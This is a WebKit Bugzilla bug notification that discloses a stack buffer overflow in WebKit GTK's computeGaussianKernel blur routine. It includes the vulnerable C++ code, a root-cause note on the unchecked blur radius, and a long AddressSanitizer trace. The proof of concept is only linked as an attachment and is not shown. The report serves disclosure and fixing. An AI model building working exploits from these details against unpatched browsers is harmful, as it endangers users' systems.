[Webkit-unassigned] [Bug 265659] New: [GTK] WebKit GTK computeGaussianKernel Stack Buffer Overflow Vulnerability
bugzilla-daemon at webkit.org
bugzilla-daemon at webkit.org
Fri Dec 1 05:29:27 PST 2023
https://bugs.webkit.org/show_bug.cgi?id=265659
Bug ID: 265659
Summary: [GTK] WebKit GTK computeGaussianKernel Stack Buffer
Overflow Vulnerability
Product: WebKit
Version: WebKit Local Build
Hardware: PC
OS: Linux
Status: NEW
Keywords: Gtk
Severity: Normal
Priority: P3
Component: DOM
Assignee: webkit-unassigned at lists.webkit.org
Reporter: pswpsw0177 at gmail.com
Created attachment 468832
--> https://bugs.webkit.org/attachment.cgi?id=468832&action=review
PoC file
1. Vulnerability Title
a. WebKit GTK computeGaussianKernel Stack Buffer Overflow Vulnerability
2. High-level overview of the vulnerability and the possible effect of using it
1. The Stack Buffer Overflow Vulnerability exists in WebKit GTK computeGaussianKernel function.
2. An Attacker must open a arbitrary generated HTML file to exploit this vulnerability.
3. Exact product that was found to be vulnerable including complete version information
1. Ubuntu 22.04.3 LTS
4. Root Cause Analysis (recommended but not required)
1. The vulnerability exists when referring to a stack memory area in the function `computeGaussianKernel` .
2. Refer to the `radius` in the function `computeGaussianKernel`. This causes Stack Buffer Overflow.
3. The lack of size validation for radius leads to a stack buffer overflow.
```cpp
static unsigned blurRadiusToKernelHalfSize(float radius)
{
return ceilf(radius * 2 + 1);
}
static int computeGaussianKernel(float radius, std::array<float, SimplifiedGaussianKernelMaxHalfSize>& kernel, std::array<float, SimplifiedGaussianKernelMaxHalfSize>& offset)
{
unsigned kernelHalfSize = blurRadiusToKernelHalfSize(radius);
ASSERT(kernelHalfSize <= GaussianKernelMaxHalfSize);
float fullKernel[GaussianKernelMaxHalfSize];
fullKernel[0] = 1;
float sum = fullKernel[0];
for (unsigned i = 1; i < kernelHalfSize; ++i) {
fullKernel[i] = gauss(i, radius); //====> crash here
sum += 2 * fullKernel[i];
}
float scale = 1 / sum;
for (unsigned i = 0; i < kernelHalfSize; ++i)
fullKernel[i] *= scale;
unsigned simplifiedKernelHalfSize = kernelHalfSizeToSimplifiedKernelHalfSize(kernelHalfSize);
kernel[0] = fullKernel[0];
for (unsigned i = 1; i < simplifiedKernelHalfSize; i++) {
unsigned offset1 = 2 * i - 1;
unsigned offset2 = 2 * i;
if (offset2 >= kernelHalfSize) {
kernel[i] = fullKernel[offset1];
offset[i] = offset1;
break;
}
kernel[i] = fullKernel[offset1] + fullKernel[offset2];
offset[i] = (fullKernel[offset1] * offset1 + fullKernel[offset2] * offset2) / kernel[i];
}
return simplifiedKernelHalfSize;
}
```
```cpp
=================================================================
==237950==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7f4bb2926dec at pc 0x7f4c093cc093 bp 0x7f4bb2926d90 sp 0x7f4bb2926d88
WRITE of size 4 at 0x7f4bb2926dec thread T9 (eadedCompositor)
#0 0x7f4c093cc092 in WebCore::computeGaussianKernel(float, std::array<float, 6ul>&, std::array<float, 6ul>&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperGL.cpp:359:23
#1 0x7f4c093cc092 in WebCore::TextureMapperGL::drawBlurred(WebCore::BitmapTexture const&, WebCore::FloatRect const&, float, WebCore::TextureMapperGL::Direction, bool) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperGL.cpp:872:36
#2 0x7f4c093cf333 in WebCore::TextureMapperGL::applyDropShadowFilter(WTF::RefPtr<WebCore::BitmapTexture, WTF::RawPtrTraits<WebCore::BitmapTexture>, WTF::DefaultRefDerefTraits<WebCore::BitmapTexture> >, WebCore::DropShadowFilterOperation const&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperGL.cpp:1058:13
#3 0x7f4c093d18f1 in WebCore::TextureMapperGL::applyFilter(WTF::RefPtr<WebCore::BitmapTexture, WTF::RawPtrTraits<WebCore::BitmapTexture>, WTF::DefaultRefDerefTraits<WebCore::BitmapTexture> >, WTF::RefPtr<WebCore::FilterOperation const, WTF::RawPtrTraits<WebCore::FilterOperation const>, WTF::DefaultRefDerefTraits<WebCore::FilterOperation const> > const&, bool) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperGL.cpp:1140:16
#4 0x7f4c093ba606 in WebCore::BitmapTextureGL::applyFilters(WebCore::TextureMapper&, WebCore::FilterOperations const&, bool) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/BitmapTextureGL.cpp:180:28
#5 0x7f4c093aef34 in WebCore::TextureMapperLayer::paintIntoSurface(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:680:40
#6 0x7f4c093ae29f in WebCore::TextureMapperLayer::paintSelfAndChildrenWithIntermediateSurface(WebCore::TextureMapperPaintOptions&, WebCore::IntRect const&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:719:9
#7 0x7f4c093ada93 in WebCore::TextureMapperLayer::paintSelfChildrenFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:653:17
#8 0x7f4c093ac7d2 in WebCore::TextureMapperLayer::paintSelfChildrenReplicaFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:744:9
#9 0x7f4c093a5d6a in WebCore::TextureMapperLayer::paintRecursive(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:761:9
#10 0x7f4c093a7b85 in WebCore::TextureMapperLayer::paintSelfAndChildren(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:295:16
#11 0x7f4c093a8525 in WebCore::TextureMapperLayer::paintSelfAndChildrenWithReplica(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:331:5
#12 0x7f4c093ac63a in WebCore::TextureMapperLayer::paintSelfChildrenReplicaFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:746:9
#13 0x7f4c093a5d6a in WebCore::TextureMapperLayer::paintRecursive(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:761:9
#14 0x7f4c093a7b85 in WebCore::TextureMapperLayer::paintSelfAndChildren(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:295:16
#15 0x7f4c093a8525 in WebCore::TextureMapperLayer::paintSelfAndChildrenWithReplica(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:331:5
#16 0x7f4c093ac63a in WebCore::TextureMapperLayer::paintSelfChildrenReplicaFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:746:9
#17 0x7f4c093a5d6a in WebCore::TextureMapperLayer::paintRecursive(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:761:9
#18 0x7f4c093a7b85 in WebCore::TextureMapperLayer::paintSelfAndChildren(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:295:16
#19 0x7f4c093a8525 in WebCore::TextureMapperLayer::paintSelfAndChildrenWithReplica(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:331:5
#20 0x7f4c093ac63a in WebCore::TextureMapperLayer::paintSelfChildrenReplicaFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:746:9
#21 0x7f4c093a5d6a in WebCore::TextureMapperLayer::paintRecursive(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:761:9
#22 0x7f4c093a7b85 in WebCore::TextureMapperLayer::paintSelfAndChildren(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:295:16
#23 0x7f4c093a8525 in WebCore::TextureMapperLayer::paintSelfAndChildrenWithReplica(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:331:5
#24 0x7f4c093ac63a in WebCore::TextureMapperLayer::paintSelfChildrenReplicaFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:746:9
#25 0x7f4c093a5d6a in WebCore::TextureMapperLayer::paintRecursive(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:761:9
#26 0x7f4c093a7b85 in WebCore::TextureMapperLayer::paintSelfAndChildren(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:295:16
#27 0x7f4c093a8525 in WebCore::TextureMapperLayer::paintSelfAndChildrenWithReplica(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:331:5
#28 0x7f4c093ac63a in WebCore::TextureMapperLayer::paintSelfChildrenReplicaFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:746:9
#29 0x7f4c093a5d6a in WebCore::TextureMapperLayer::paintRecursive(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:761:9
#30 0x7f4c093a7b85 in WebCore::TextureMapperLayer::paintSelfAndChildren(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:295:16
#31 0x7f4c093a8525 in WebCore::TextureMapperLayer::paintSelfAndChildrenWithReplica(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:331:5
#32 0x7f4c093ac63a in WebCore::TextureMapperLayer::paintSelfChildrenReplicaFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:746:9
#33 0x7f4c093a5d6a in WebCore::TextureMapperLayer::paintRecursive(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:761:9
#34 0x7f4c093a7b85 in WebCore::TextureMapperLayer::paintSelfAndChildren(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:295:16
#35 0x7f4c093a8525 in WebCore::TextureMapperLayer::paintSelfAndChildrenWithReplica(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:331:5
#36 0x7f4c093ac63a in WebCore::TextureMapperLayer::paintSelfChildrenReplicaFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:746:9
#37 0x7f4c093a5d6a in WebCore::TextureMapperLayer::paintRecursive(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:761:9
#38 0x7f4c093a5810 in WebCore::TextureMapperLayer::paint(WebCore::TextureMapper&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:178:5
#39 0x7f4c0844ed7c in WebKit::CoordinatedGraphicsScene::paintToCurrentGLContext(WebCore::TransformationMatrix const&, WebCore::FloatRect const&, unsigned int) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Shared/CoordinatedGraphics/CoordinatedGraphicsScene.cpp:76:23
#40 0x7f4c0846e585 in WebKit::ThreadedCompositor::renderLayerTree() /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Shared/CoordinatedGraphics/threadedcompositor/ThreadedCompositor.cpp:251:14
#41 0x7f4c08472c5f in WebKit::ThreadedCompositor::ThreadedCompositor(WebKit::ThreadedCompositor::Client&, WebKit::ThreadedDisplayRefreshMonitor::Client&, unsigned int, WebCore::IntSize const&, float, unsigned int)::$_0::operator()() const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Shared/CoordinatedGraphics/threadedcompositor/ThreadedCompositor.cpp:60:68
#42 0x7f4c08472c5f in WTF::Detail::CallableWrapper<WebKit::ThreadedCompositor::ThreadedCompositor(WebKit::ThreadedCompositor::Client&, WebKit::ThreadedDisplayRefreshMonitor::Client&, unsigned int, WebCore::IntSize const&, float, unsigned int)::$_0, void>::call() /home/fuzz/Downloads/webkitgtk-2.41.92/build/WTF/Headers/wtf/Function.h:53:39
#43 0x7f4c0845b46f in WTF::Function<void ()>::operator()() const /home/fuzz/Downloads/webkitgtk-2.41.92/build/WTF/Headers/wtf/Function.h:82:35
#44 0x7f4c0845b46f in WebKit::CompositingRunLoop::updateTimerFired() /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Shared/CoordinatedGraphics/threadedcompositor/CompositingRunLoop.cpp:179:5
#45 0x7f4c0846af2b in void std::__invoke_impl<void, void (WebKit::CompositingRunLoop::*&)(), WebKit::CompositingRunLoop*&>(std::__invoke_memfun_deref, void (WebKit::CompositingRunLoop::*&)(), WebKit::CompositingRunLoop*&) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/invoke.h:74:14
#46 0x7f4c0846af2b in std::__invoke_result<void (WebKit::CompositingRunLoop::*&)(), WebKit::CompositingRunLoop*&>::type std::__invoke<void (WebKit::CompositingRunLoop::*&)(), WebKit::CompositingRunLoop*&>(void (WebKit::CompositingRunLoop::*&)(), WebKit::CompositingRunLoop*&) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/invoke.h:96:14
#47 0x7f4c0846af2b in void std::_Bind<void (WebKit::CompositingRunLoop::* (WebKit::CompositingRunLoop*))()>::__call<void, 0ul>(std::tuple<>&&, std::_Index_tuple<0ul>) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/functional:420:11
#48 0x7f4c0846af2b in void std::_Bind<void (WebKit::CompositingRunLoop::* (WebKit::CompositingRunLoop*))()>::operator()<void>() /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/functional:503:17
#49 0x7f4c0846af2b in WTF::Detail::CallableWrapper<std::_Bind<void (WebKit::CompositingRunLoop::* (WebKit::CompositingRunLoop*))()>, void>::call() /home/fuzz/Downloads/webkitgtk-2.41.92/build/WTF/Headers/wtf/Function.h:53:39
#50 0x7f4c07f0b0b3 in WTF::Function<void ()>::operator()() const /home/fuzz/Downloads/webkitgtk-2.41.92/build/WTF/Headers/wtf/Function.h:82:35
#51 0x7f4c07f0b0b3 in WTF::RunLoop::Timer::fired() /home/fuzz/Downloads/webkitgtk-2.41.92/build/WTF/Headers/wtf/RunLoop.h:195:33
#52 0x7f4c04b07ed8 in WTF::RunLoop::TimerBase::TimerBase(WTF::RunLoop&)::$_3::operator()(void*) const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:177:16
#53 0x7f4c04b07ed8 in WTF::RunLoop::TimerBase::TimerBase(WTF::RunLoop&)::$_3::__invoke(void*) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:169:43
#54 0x7f4c04b05433 in WTF::RunLoop::$_0::operator()(_GSource*, int (*)(void*), void*) const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:53:28
#55 0x7f4c04b05433 in WTF::RunLoop::$_0::__invoke(_GSource*, int (*)(void*), void*) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:45:5
#56 0x7f4bfcb20c43 in g_main_context_dispatch (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x55c43) (BuildId: c74e800dfd5f72649d673b44292f4a817e45150b)
#57 0x7f4bfcb76257 (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0xab257) (BuildId: c74e800dfd5f72649d673b44292f4a817e45150b)
#58 0x7f4bfcb202b2 in g_main_loop_run (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x552b2) (BuildId: c74e800dfd5f72649d673b44292f4a817e45150b)
#59 0x7f4c04b069c8 in WTF::RunLoop::run() /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:108:9
#60 0x7f4c0499e9c8 in WTF::RunLoop::create(char const*, WTF::ThreadType, WTF::Thread::QOS)::$_1::operator()() const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/RunLoop.cpp:114:9
#61 0x7f4c0499e9c8 in WTF::Detail::CallableWrapper<WTF::RunLoop::create(char const*, WTF::ThreadType, WTF::Thread::QOS)::$_1, void>::call() /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/Function.h:53:39
#62 0x7f4c049a97ff in WTF::Function<void ()>::operator()() const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/Function.h:82:35
#63 0x7f4c049a97ff in WTF::Thread::entryPoint(WTF::Thread::NewThreadContext*) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/Threading.cpp:250:5
#64 0x7f4c04b147a8 in WTF::wtfThreadEntryPoint(void*) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/posix/ThreadingPOSIX.cpp:242:5
#65 0x7f4bfc494ac2 in start_thread nptl/./nptl/pthread_create.c:442:8
#66 0x7f4bfc526a3f misc/../sysdeps/unix/sysv/linux/x86_64/clone3.S:81
Address 0x7f4bb2926dec is located in stack of thread T9 (eadedCompositor) at offset 76 in frame
#0 0x7f4c093cbcbf in WebCore::TextureMapperGL::drawBlurred(WebCore::BitmapTexture const&, WebCore::FloatRect const&, float, WebCore::TextureMapperGL::Direction, bool) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperGL.cpp:856
This frame has 6 object(s):
[32, 76) 'fullKernel.i' (line 354) <== Memory access at offset 76 overflows this variable
[112, 120) 'program' (line 857)
[144, 168) 'kernel' (line 870)
[208, 232) 'offset' (line 871)
[272, 400) 'textureBlurMatrix' (line 877)
[432, 560) 'ref.tmp53' (line 895)
HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
(longjmp and C++ exceptions *are* supported)
Thread T9 (eadedCompositor) created by T0 here:
#0 0x560a95b0a5dc in pthread_create (/home/fuzz/Downloads/webkitgtk-2.41.92/build/libexec/webkit2gtk-4.0/WebKitWebProcess+0x8a5dc) (BuildId: 993abfac4fe138f0c15349dccc801d74c501b984)
#1 0x7f4c04b14593 in WTF::Thread::establishHandle(WTF::Thread::NewThreadContext*, std::optional<unsigned long>, WTF::Thread::QOS) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/posix/ThreadingPOSIX.cpp:292:17
#2 0x7f4c049a9e31 in WTF::Thread::create(char const*, WTF::Function<void ()>&&, WTF::ThreadType, WTF::Thread::QOS) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/Threading.cpp:266:32
#3 0x7f4c0499c7d8 in WTF::RunLoop::create(char const*, WTF::ThreadType, WTF::Thread::QOS) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/RunLoop.cpp:111:5
#4 0x7f4c0845b0b9 in WebKit::CompositingRunLoop::CompositingRunLoop(WTF::Function<void ()>&&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Shared/CoordinatedGraphics/threadedcompositor/CompositingRunLoop.cpp:43:17
#5 0x7f4c0846b26d in std::_MakeUniq<WebKit::CompositingRunLoop>::__single_object std::make_unique<WebKit::CompositingRunLoop, WebKit::ThreadedCompositor::ThreadedCompositor(WebKit::ThreadedCompositor::Client&, WebKit::ThreadedDisplayRefreshMonitor::Client&, unsigned int, WebCore::IntSize const&, float, unsigned int)::$_0>(WebKit::ThreadedCompositor::ThreadedCompositor(WebKit::ThreadedCompositor::Client&, WebKit::ThreadedDisplayRefreshMonitor::Client&, unsigned int, WebCore::IntSize const&, float, unsigned int)::$_0&&) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/unique_ptr.h:962:34
#6 0x7f4c0846b26d in decltype(auto) WTF::makeUnique<WebKit::CompositingRunLoop, WebKit::ThreadedCompositor::ThreadedCompositor(WebKit::ThreadedCompositor::Client&, WebKit::ThreadedDisplayRefreshMonitor::Client&, unsigned int, WebCore::IntSize const&, float, unsigned int)::$_0>(WebKit::ThreadedCompositor::ThreadedCompositor(WebKit::ThreadedCompositor::Client&, WebKit::ThreadedDisplayRefreshMonitor::Client&, unsigned int, WebCore::IntSize const&, float, unsigned int)::$_0&&) /home/fuzz/Downloads/webkitgtk-2.41.92/build/WTF/Headers/wtf/StdLibExtras.h:596:12
#7 0x7f4c0846b26d in WebKit::ThreadedCompositor::ThreadedCompositor(WebKit::ThreadedCompositor::Client&, WebKit::ThreadedDisplayRefreshMonitor::Client&, unsigned int, WebCore::IntSize const&, float, unsigned int) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Shared/CoordinatedGraphics/threadedcompositor/ThreadedCompositor.cpp:60:28
#8 0x7f4c0846aff4 in WebKit::ThreadedCompositor::create(WebKit::ThreadedCompositor::Client&, WebKit::ThreadedDisplayRefreshMonitor::Client&, unsigned int, WebCore::IntSize const&, float, unsigned int) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Shared/CoordinatedGraphics/threadedcompositor/ThreadedCompositor.cpp:54:26
#9 0x7f4c09262071 in WebKit::LayerTreeHost::LayerTreeHost(WebKit::WebPage&, unsigned int) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/WebProcess/WebPage/CoordinatedGraphics/LayerTreeHost.cpp:82:20
#10 0x7f4c0925b38d in std::_MakeUniq<WebKit::LayerTreeHost>::__single_object std::make_unique<WebKit::LayerTreeHost, WebKit::WebPage&, unsigned long>(WebKit::WebPage&, unsigned long&&) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/unique_ptr.h:962:34
#11 0x7f4c0925b38d in decltype(auto) WTF::makeUnique<WebKit::LayerTreeHost, WebKit::WebPage&, unsigned long>(WebKit::WebPage&, unsigned long&&) /home/fuzz/Downloads/webkitgtk-2.41.92/build/WTF/Headers/wtf/StdLibExtras.h:596:12
#12 0x7f4c0925b38d in WebKit::DrawingAreaCoordinatedGraphics::enterAcceleratedCompositingMode(WebCore::GraphicsLayer*) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/WebProcess/WebPage/CoordinatedGraphics/DrawingAreaCoordinatedGraphics.cpp:596:27
#13 0x7f4c0925afda in WebKit::DrawingAreaCoordinatedGraphics::enterAcceleratedCompositingModeIfNeeded() /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/WebProcess/WebPage/CoordinatedGraphics/DrawingAreaCoordinatedGraphics.cpp:293:5
#14 0x7f4c0916d290 in WebKit::WebPage::WebPage(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/WebProcess/WebPage/WebPage.cpp:799:24
#15 0x7f4c0916831e in WebKit::WebPage::create(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/WebProcess/WebPage/WebPage.cpp:492:31
#16 0x7f4c08c9203c in WebKit::WebProcess::createWebPage(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/WebProcess/WebProcess.cpp:856:21
#17 0x7f4c07912bd1 in auto void IPC::callMemberFunction<WebKit::WebProcess, WebKit::WebProcess, void (WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters> >(WebKit::WebProcess*, void (WebKit::WebProcess::*)(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>&&)::'lambda'(auto&&...)::operator()<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>(auto&&...) const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Platform/IPC/HandleMessage.h:136:13
#18 0x7f4c07912bd1 in WebKit::WebProcess std::__invoke_impl<void, void IPC::callMemberFunction<WebKit::WebProcess, WebKit::WebProcess, void (WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters> >(WebKit::WebProcess*, void (WebKit::WebProcess::*)(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>&&)::'lambda'(auto&&...), WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>(std::__invoke_other, WebKit::WebProcess&&, WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>&&, WebKit::WebPageCreationParameters&&) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/invoke.h:61:14
#19 0x7f4c07912bd1 in std::__invoke_result<WebKit::WebProcess, WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>::type std::__invoke<void IPC::callMemberFunction<WebKit::WebProcess, WebKit::WebProcess, void (WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters> >(WebKit::WebProcess*, void (WebKit::WebProcess::*)(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>&&)::'lambda'(auto&&...), WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>(WebKit::WebProcess&&, WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>&&, WebKit::WebPageCreationParameters&&) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/invoke.h:96:14
